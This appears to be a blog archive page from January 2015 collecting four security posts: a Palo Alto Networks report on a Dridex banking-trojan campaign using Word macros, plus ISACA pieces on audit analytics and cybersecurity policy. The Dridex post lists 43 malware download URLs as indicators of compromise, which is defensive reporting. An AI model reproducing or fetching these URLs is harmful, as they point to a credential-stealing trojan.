Month: January 2015

Posted on

Dridex Banking Trojan Begins 2015 with a Bang

In October, we called out a series of attacks installing the Dridex Trojan using macros in Microsoft Word documents. Those attacks continued over the last few months and in first two weeks of the new calendar year we’ve seen another new campaign.

To refresh your memory, Dridex is the latest version of the Bugat/Feodo/Cridex banking Trojan. Its core functionality is to steal credentials of online banking websites and allow a criminal to use those credentials to initiate transfers and steal funds. Dridex is currently being distributed through an e-mail campaign that carries a Word Document attachment, which uses built-in macro code to download and execute a copy of the Trojan.

While Dridex targets banks from all over the world, in October the majority of the e-mails we tracked were destined for the United States, with the United Kingdom coming in at a distant second place. This time around the UK comes out on top, with over one third of all attacks observed there.

This change in targeting is also clear in the themes used in each of the attacks. Many of the most-common attachment names refer to the BACS, or Bankers’ Automated Clearing Services, which is used for bank transfers in the UK. Another group of e-mails claimed to be an invoice from the Les Mills UK, a fitness organization. This campaign is likely preying on individuals who have made New Year’s resolutions to get fit in the UK.

In October we had identified just six URLs used by the Word documents to download the Dridex Trojan. In the past two weeks we’ve detected files using 43 different download locations.

  • 108.59.252.116/mops/pops.php
  • 111.125.170.132/doc/8.exe
  • 159.253.19.113/ord/1.exe
  • 178.77.79.224/mops/pops.php
  • 188.241.116.63/mops/pops.php
  • 192.157.233.28/ord/1.exe
  • 192.227.167.32/mops/pops.php
  • 193.136.19.160/mans/pops.php
  • 194.28.139.100/mans/pops.php
  • 206.72.192.15/mans/pops.php
  • 213.174.162.126/mans/pops.php
  • 213.9.95.58/mans/pops.php
  • 87.106.165.232/mans/pops.php
  • aircraftpolish.com/js/bin.exe
  • betterinnovation.net/modules/mod_arateiclws/cr_7_2711_2.exe
  • cerovski1.net.amis.hr/js/bin.exe
  • curie-hennebont.fr/js/bin.exe
  • dollarbrasil.com.br/444
  • ecovoyage.hi2.ro/js/bin.exe
  • elsy.pwp.blueyonder.co.uk/444
  • fachonet.com/js/bin.exe
  • gofoto.dk/js/bin.exe
  • gv-roth.de/js/bin.exe
  • interativaonline.com/444
  • jasoncurtis.co.uk/js/bin.exe
  • lapiden.com/wp-content/themes/twentytwelve/mss20.exe
  • lapiden.com/wp-content/themes/twentytwelve/mss22.exe
  • lichtblick-tiere.de/js/bin.exe
  • media.mystudio.net/js/bin.exe
  • microinvent.com/js/bin.exe
  • nestorausqui.com/444
  • ngrbook.com/cp/images/digits/blushdw/cr_7_2711_2.exe
  • nubsjackbox.oboroduki.com/js/bin.exe
  • obuwiehurt.com.pl/js/bin.exe
  • paulmartinseo.com/wp-content/themes/twentyten/cr_7_2711_13.exe
  • phaluzan.net.amis.hr/js/bin.exe
  • riccis.homepage.t-online.de/Testseite/js/bin.exe
  • sardiniarealestate.info/js/bin.exe
  • ticklestootsies.com/js/bin.exe
  • walkdesign.com/wp-content/themes/willow/cr7_2711_1.exe
  • weme-systems.de/modules/mod_arateiclws/mss3.exe
  • http://www.isolectra.com.sg/tmp/rk2n1.exe
  • zusso.jp/444

Many of these URLs are hosted on compromised websites, but there is no clear pattern to indicate how they are taking control of the websites. However, there are clear groupings of patterns for the download URLs. One group relies on the path “/js/bin.exe” while another uses “mops/pops.php”. These URLs are encoded within the macros included in each file. If you are interested in extracting them, Rodel Mendrez from SpiderLabs wrote a short guide using Python. If you want to take the simpler route, Didier Steven’s OLE Dump tool has a plug-in that will automatically decode and extract these URLs, as shown below.

Palo Alto Networks WildFire detects all of these macro-based attacks using our sandbox technology. Others can protect themselves by disabling macros in Microsoft Word. Macro-based malware has been around for over well over a decade. Most organizations should disable them by default, enabling macros only for trusted files.

[Palo Alto Networks Blog]

Posted on

Integrating Data Analytics Into a Risk-Based IT Audit

Although most would agree that internal audit is an assurance function, I like to think of internal auditors as value-added trusted advisors. A given mandate will provide assurance on processes that are functioning appropriately; however, the real value is in identifying areas of improvement that add tangible value back to the organisation. Data analytics has long been my tool of choice to help accomplish this value in an effective and efficient manner.

At ISACA’s 2015 North America Computer Audit, Control and Security (CACS) conference, I will be presenting alongside Bob Cuthbertson, COO of CaseWare IDEA Inc., on successful integration of data analytics within a risk-based IT audit universe. In a prelude to our session, I would like to provide examples from my own work in the past that I will be adding to, along with others, during the session on 16 March in Orlando, Florida.

Getting Started—Scoping the Audit Engagement

Understanding the business is the first and most crucial step in the audit process. It is what determines the amount of value you can potentially provide to key stakeholders. Shown in scenario 1 below, data analytics can be used before the audit begins as a status indicator of the risks facing an organization. And with this information, internal audit is able to improve the audit effectiveness as well, with the ultimate effort of providing value to the organisation.

Scenario 1: Driving the Audit Scope

Areas of Risk Identified:

  • Change Management
  • Project Management

Challenge:  Time limitations allowed only one area of focus for the audit year.
Solution:  High-level analytics of change logs and project management databases uncovered significant internal development projects.
Results:  The System Development Life Cycle (SDLC) process was therefore identified as an area of immediate value to the organization.

Homing in on Insights Gained (Audit Execution)

To save time and resources, the use of data analytics in the planning phase helps develop greater understanding of where the hotspots are in terms of risk. Outlined in scenario 2 below, utilizing 100 percent of the available data enables internal audit to truly focus and identify anomalies within areas that have been identified as high risk.

Scenario 2: Testing Compliance

Mandate:  Operational efficiency—IT help desk tickets

Challenge:  More than 140,000 tickets were opened and closed during the year.

Solution:  Use data analytics to identify trends to ensure the IT department meets the service level requirements—as delineated in the service level agreement (SLA).

Steps:

  1. Obtain an extract from the ticket management system (Footprints). Confirm data completeness by verifying record count on screen (from the system) to the csv dump.
  2. Execute a trend analysis based on tickets closed by employee, criticality and category type, amount of time from “Ticket Open date” to “Ticket Close date.”
  3. Confirm compliance to SLA.

Results:  The analytics showed that the IT group was in compliance with the agreed-upon SLA. Encouragingly, management was very interested in our data analysis, which led to the development of a dashboard for both operational efficiency (which was performed manually at the time by the director) and employee performance. The employee performance KPIs were then linked to their respective annual evaluations for a more objective evaluation of the core performance of the help desk employee.

Reporting Results

The insights found during the audit execution are what allow you to create a report that will provide value to the organization. They are the first step to providing a tangible root cause analysis and shedding light on the compliance and governance failures that matter most to companies.

The reporting phase is crucial when it comes to providing the added value for which we strive. If you have performed your audit effectively, the report will only include validated control deficiencies. The use of data analytics throughout the audit process should allow time to report on exact findings, highlight root causes and provide tangible recommendations. Furthermore, data analytics, namely data visualisation, can be used to convey high amounts of data and information in one image. I always remind myself that information is what the other party receives and not what I say. Therefore, the use of data visualisation to ensure the identified efficiencies make it across to the reader is yet another way in which data analytics helps me become the value-added trusted advisor I strive to be.

Conclusion

We have been using data analytics and attaining value by operating in a systematic and structured manner. We maximize our investment through these efficiencies and are able to provide stakeholders with the answers to questions before they even have them. This can and will continue to increase our value as internal auditors and trusted advisors to the business. During the session at North America CACS in March, I will be expanding on the processes behind these scenarios along with more examples using analytics tactics and visualisation methods. I hope to see you there!

Seren Dagdeviren, CPA, CIA
Manager, Internal Audit, Ivanhoé Cambridge
Montreal, QC, Canada

Seren Dagdeviren will present “Building Momentum” at 2015 North America CACS in Orlando, Florida, USA, 16-18 March 2015. For information and to register, visit www.isaca.org/northamericacacs2015.

[ISACA]

Posted on

CNBC Talks to Cyber Threat Alliance About Taking the Fight to Cyberattackers

Today at Palo Alto Networks HQ we hosted the four co-founders of the Cyber Threat Alliance, which includes our own Mark McLaughlin, for a live discussion on CNBC’s Squawk Alley that was squarely focused on how collaboration between security companies is helping customers in the ongoing battle against cyberattackers. Mark and his fellow co-founders also touched on the latest cybersecurity legislation to come out of Washington.

Watch the full interview here, learn more about the Cyber Threat Alliance here and check out a few shots of the behind-the-scenes action at HQ this morning.

 [Palo Alto Networks Blog]

 

Posted on

Will Government Be An Effective Cybersecurity Leader or Passive Bystander?

Our industry has been discussing the need for updates to critical public electronic communications laws and policies; reductions in corporate liability for intelligence sharing; national data breach legislation to replace the morass of US state laws; and increases in funding for cybersecurity education, research and standards for many years.

There are two milestones that make a transition from conversation and confusion to clear and decisive action so important now. The first is that we’ve reached critical mass in both corporate and consumer understanding and perception of the importance of cybersecurity. While mega breaches are not new, consumers’ inconvenience of swapping credit card numbers has largely been the extent of impact for most Americans in the past and attention has quickly waned. This year, consumers and corporate citizens at all levels experienced multiple breaches that created a saga of compounding and widespread impact—from credit cards, to corporate espionage, to threats of physical terrorism—and sustained attention for months.

The second, more troubling factor is escalation. While some of the nation state saber- rattling may be just that, the ease with which cybercriminals compromised a significant footprint of the retail and digital advertising sector—and the aggressive and calculated manner in which they compromised and then meted out damage on Sony and other very mature organizations—is a major milestone and also an unsettling indicator of things to come.

It is critical that we begin to disrupt the cyber adversaries and their economic and political incentives. This disruption requires a concerted effort , and the government either can play a modern and effective leadership role or be a passive bystander commenting on the state of affairs. In the State of the Union speech President Barack Obama will provide a clear indicator of which direction the US government is heading on this issue.

ISACA is seeking to address cybersecurity challenges, including the global skills gap and need for guidance, in 2015 and beyond. With the critical skills gap in cybersecurity and the need for greater industry engagement and peer conversations around security governance, cyber career progression, standards, training curricula and professional certification, ISACA’s Cybersecurity Nexus(CSX) plays a pivotal role in bringing practitioners together worldwide and creating a launchpad for cybersecurity experts and solutions of the future.

Eddie Schwartz, CISA, CISM, president of WhiteOps and chair of ISACA’s Cybersecurity Task Force

[ISACA]

English
English
Exit mobile version